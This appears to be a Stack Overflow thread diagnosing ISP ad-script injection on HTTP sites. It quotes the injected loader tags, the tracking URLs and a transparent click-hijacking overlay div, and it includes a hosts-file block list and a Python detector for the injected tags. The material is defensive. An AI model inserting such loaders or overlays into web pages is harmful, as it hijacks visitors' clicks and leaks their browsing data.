
Problem: Sometimes, on clicking on the NAVBAR menu or on any div on my Bootstrap website, it redirects to ads or unknown links in a new tab, something like this.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from the hosted file:

    <!-- paths use forward slashes; the backslashes in the original href values are not valid URL separators -->
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

    <link rel="stylesheet" type="text/css" href="css/style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

    <script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap"></script>

What I got in Inspection:

I checked my code multiple times when there was no redirect on clicking the menu. I found nothing suspicious. BUT THEN, when I got redirect links on click, I checked my code in the browser and I can clearly see a few script sources added to my files (visible only in the browser's Inspect mode). They are not written in my code. The unknown parts of my code are:

1) HERE, the following 2 scripts are replacing the script js/jquery.min.js in the head tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to the body tag right after the Google API import

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript"></script>
</span>

3) This one is also in the body tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url('data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'); position: absolute; z-index: 2000;"></div>

4) On inspecting the redirect link, the HEADERS info:

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:

My code is clean and there is no script redirecting it anywhere. It may be my browser or Windows being compromised. I checked the website from 3 browsers, EDGE, CHROME, FIREFOX, and got the same problem. Then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support whether the server is compromised; they replied it's okay from their end. I installed Malwarebytes and all the software to solve it, but they just notify that Chrome / Firefox / Edge is redirecting to an outbound ID with some domain name, mostly go.oclasrv.com, and do nothing.

**ANY SOLUTION???**

UPDATE:

I got a similar redirect on the Hostgator support feedback link.

On noticing, here the domain name in the string is replaced by rateus.in; zoneid=1492761 is the same whatever unsecured link I open; also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx change for different links, and fingerprint=c2VwLW5vLXJlZGlyZWN0 is the same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to WIN10 Pro and I have installed only Chrome, without any plugins.

The problem is browser independent, as I got the same results on EDGE and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

aman
  • Sounds like a virus or JS injection. Not much we can do about that. – Paulie_D Jun 27 '18 at 14:12
  • This may or may not help, but can you try serving your site over HTTPS? It would help determine where along the transport of your content the tampering is occurring. – zero298 Jun 27 '18 at 14:14
  • It happens due to BSNL injecting their AD scripts when the HTTP request is an unsecured one. You can add an IP Security policy on your local machine/domain systems following this post https://davidsekar.com/misc/block-bsnl-ads-using-ipsec – David Chelliah Oct 15 '18 at 09:43
  • Similar complaints reported at https://www.reddit.com/r/india/comments/8wj6ec/bsnl_and_mtnl_are_injecting_malicious_ads_on/ – Agnel Vishal Dec 22 '18 at 18:20
  • BSNL n/w is the real culprit.. – Mohammedshafeek C S Dec 14 '20 at 14:50
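As an added check that is not part of the question or any of the answers: a small Python script that parses a captured DOM (a constructed sample modelled on the DevTools markup shown in the question) and flags the script tags that match the injected pattern (the getjs loader on an IP:3000 host, the apu.php zone loader, and the site's own jQuery re-requested with a fingerprint parameter), then decodes the nadipdata payload to show what the loader reports upstream. Function names are my own, and the fingerprint value from the question base64-decodes to the string sep-no-redirect.

```python
import base64
import json
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample modelled on the DevTools markup in the question: the first two
# <script> tags follow the injected pattern, the third is the site's own include.
SAMPLE_HTML = """
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%7D"&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<span id="notiMain"><script src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
"""

class _ScriptSources(HTMLParser):
    # Collects the src of every <script>; HTMLParser already unescapes &amp; in attributes.
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.srcs.append(src)

def classify_script(src):
    """Return why a script src matches the injection pattern described in the thread, else None."""
    parts = urlsplit(src)
    query = parse_qs(parts.query)
    if parts.path.endswith("/getjs") and "nadipdata" in query:
        return "getjs loader"          # the loader served from <ip>:3000
    if parts.path.endswith("/apu.php") and "zoneid" in query:
        return "ad zone loader"        # the pop-under / redirect ad script
    if "fingerprint" in query:
        return "fingerprinted script"  # the site's own jQuery re-requested with tracking params
    return None

def find_injected(html):
    """Parse a captured DOM and return [(src, reason)] for every script matching the pattern."""
    parser = _ScriptSources()
    parser.feed(html)
    found = [(s, classify_script(s)) for s in parser.srcs]
    return [(s, r) for s, r in found if r]

def decode_nadipdata(src):
    """Decode what the getjs loader reports upstream: the JSON in nadipdata plus the base64 fingerprint."""
    query = parse_qs(urlsplit(src).query)                 # parse_qs percent-decodes the values
    meta = json.loads(query["nadipdata"][0].strip('"'))   # the JSON is wrapped in literal quotes
    meta["fingerprint"] = base64.b64decode(query["fingerprint"][0]).decode()
    return meta
```

Feed it the outer HTML copied from the Elements panel of an affected page; the decoded metadata (requested path, referer, host) is what the injector learns from each plain-HTTP request, which is the reason the answers below recommend HTTPS.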

7 Answers


This seems to be a case of the ISP injecting JavaScript files. Are you by any chance on BSNL broadband? For the last few days, BSNL seems to be injecting adware on HTTP (non-encrypted) sites.

The only solution I know is to host your site on HTTPS OR change your ISP.

Sai
Jayson Chacko
  • Yes. This is happening on BSNL broadband and BSNL mobile. They are injecting adware on HTTP traffic, intercepting and pushing JavaScript files. – Jayson Chacko Jul 08 '18 at 14:08
  • I am also using BSNL and this is happening across all my devices, desktop, mobile phones etc. on non-HTTPS sites. A very poor way for an ISP to make money. I reached this page by searching BSNL and cobalten – Shafeek Jul 08 '18 at 16:14
  • The only solution is to raise a grievance request on the BSNL portal letting them know that this is a really bad way. Some of the links are pointing to really shady websites. – Jayson Chacko Jul 09 '18 at 17:45
  • Same issue here – Gaurav Rai Aug 01 '18 at 14:13
  • You can also block requests to 117.240.205.115:3000 via your router till BSNL resolves this issue from their end. I did the same in my D-LINK router. But do report this issue via grievance and using Twitter. – nav Aug 08 '18 at 13:34
  • From this page https://www.quora.com/What-is-cobalten-com-redirect-virus: if using Chrome, go to chrome://settings/content/javascript and under the "Block" section add [*.]cobalten.com. This stopped the pop-ups on my BSNL broadband and mobile data. – Indraneel Sep 02 '18 at 12:18
  • Is it BSNL or some bad BSNL employee? – Nandakumar Edamana Oct 11 '18 at 06:35
  • It could well be a corrupt employee. I am seeing that sometimes it is even forwarding to very nasty websites. – Jayson Chacko Oct 11 '18 at 12:11
  • This is definitely coming from the BSNL network only. And it affects (and can only affect) non-secure sites. Want to add: use HTTPS anyway, because Google might end up flagging your website as bad because of a script injected by BSNL. Set up Cloudflare and HTTPS redirects using Cloudflare – anups Oct 31 '18 at 11:18
  • It is not necessarily your hosting. If you visit any website on any server, if the site is non-HTTPS, your clicks are getting hijacked. Does this mean that you don't browse any non-HTTPS site? – Joshi Nov 13 '18 at 19:00

This issue that you are having is server-side. Likely nothing is wrong with your code; however, the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.

Jake Chasan
  • Currently I am on a shared hosting plan on Hostgator. As it's a static website, I can't afford a dedicated server for a static website. I can add an SSL certificate to the domain but don't know if that will solve my problem. Hostgator support was pathetic for the same; their words were "what you want me to do". – aman Jun 27 '18 at 19:35
  • Also, do protection add-ons like Sitelock Malware Protector on Hostgator even work to prevent malware attacks? OR, I am guessing they are intentionally infecting shared hosting to sell their add-ons. Any better malware-free shared host provider with the best uptime for the Canada region? – aman Jun 27 '18 at 19:55
  • I would recommend making a backup of all of your code that you know is free from malware, then deleting all files on the server that you have access to, then changing all passwords (make them complex), then adding your files back. Did you try this? – Jake Chasan Jun 27 '18 at 19:56
  • That's the next step I will do. BUT today, when I contacted Hostgator and shared the code and all, they also said to change the passwords of all logins. And when I got the feedback window for Hostgator support, I got the same redirect link when I clicked on ratings: `<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script>` I didn't even install anything else on my fresh Win10 system except Chrome. I even got this problem on preinstalled EDGE before installing Chrome. Isn't it weird, or is anything wrong? – aman Jun 28 '18 at 13:19
  • Have you been able to test this on another computer? – Jake Chasan Jun 30 '18 at 01:20
  • I got exactly the same issue on my website hosted on shared GoDaddy hosting – Ashish Rathee Jun 30 '18 at 19:22
  • My blog is on WordPress; is it due to some plugin? – Ashish Rathee Jun 30 '18 at 19:22
  • Seems like some new malware – Ashish Rathee Jun 30 '18 at 19:23

If you see an unknown script injected from the following IPs, then it is the script file injected by the BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security, so it cannot be tampered with by the ISP.

The script files from these IPs are just a conduit, which downloads further AD scripts from different AD media. Most of these AD media follow intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL's excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop them.

David Chelliah

Good Catch!

BSNL servers have been corrupting or infecting with malware / viruses day by day due to poor security.

There was naganoadigei.com, which was registered explicitly to serve malware and redirect users to phishing sites.

Recently, in February 2019, they had resolved the issue. But unfortunately a new type of ad-based redirect was found, humparsi.com, as of February 2019.

You may have a look at whether the site has been infected or not by visiting Sucuri.

Alternatively, you can block the outgoing requests from your standalone system via DNS entries.

Navigate to %windir%\System32\drivers\etc and edit the hosts file in elevated mode / with admin authorization, and add these lines to your hosts file:

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL.

To block a specific IP address, you do it by blocking outbound connections in the firewall.

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing add-ons such as NoScript or ScriptSafe, and HTTPS Everywhere.

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob
Nɪsʜᴀɴᴛʜ ॐ
  • And now it's redirecting me via xalabazar.com – Udayraj Deshmukh May 24 '19 at 05:21
  • Just protect your browser fingerprint. Will you provide me with the websites it's going to redirect to via `xalabazar.com`? Is it from the broadband connection that it's happening or not? I just need to confirm the same via BSNL SIM @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 24 '19 at 05:33
  • I've checked it on a BSNL broadband connection. I believe it is happening on every HTTP website at random intervals by clickjacking. Try [this link](http://www.memo.tv); you may need to reload and click a button for about 5 minutes to confirm – Udayraj Deshmukh May 25 '19 at 07:24
  • Found the script with URL: [Be aware before clicking this link](http://117.254.84.212:3000/getjs?nadipdata=%22%7B%22url%22:%22%2Fwpmemo%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.12.4-wp%22%2C%22referer%22:%22http:%2F%2Fwww.memo.tv%2Fworks%2F%22%2C%22host%22:%22www.memo.tv%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D%22&screenheight=1080&screenwidth=1920&tm=1558777463790&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0), since it would lead all your browsing information to this IP 117.254.84.212. It will not work on BSNL SIM data. – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 10:04
  • The reason was `Ping request could not find host xalabazar.com. Please check the name and try again.` on the BSNL SIM data network; only via BSNL broadband @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 10:04
  • Yes, I know about that script from the blog post shared in the other answer here. I was just informing that they might be just changing the URL from `humparsi.com` to `xalabazar.com`, and now it's `preskalyn.com`. – Udayraj Deshmukh May 25 '19 at 11:04
  • Here you can see the screenshots [Link1](https://i.stack.imgur.com/Uy5lo.jpg) and [Link2](https://i.stack.imgur.com/PoR7B.jpg). I have updated the list of infected sites; if you find any more, include them by editing the post @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 11:14
  • Here the script is being injected into `/wpmemo/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp`; you can find the getjs() routes via the method loaded from Node.js [getjs Link](https://pastebin.com/siGNvAg5), getting our IP address from the BSNL SIM / any other ISP @UdayrajDeshmukh – Nɪsʜᴀɴᴛʜ ॐ May 25 '19 at 11:52

Simply block the URL (the BSNL IP injecting these ads) from your router's security section. For me the BSNL URL was http://117.254.84.212

Netverse

Adguard has fixed this, as referenced here, to block the clickjacking. The script can be seen in action in mobile browsers, opening new-tab advertisements.

Update your Adguard filters to the latest version to see.


Blocking this URL http://117.254.84.212:3000 in the router seems more effective.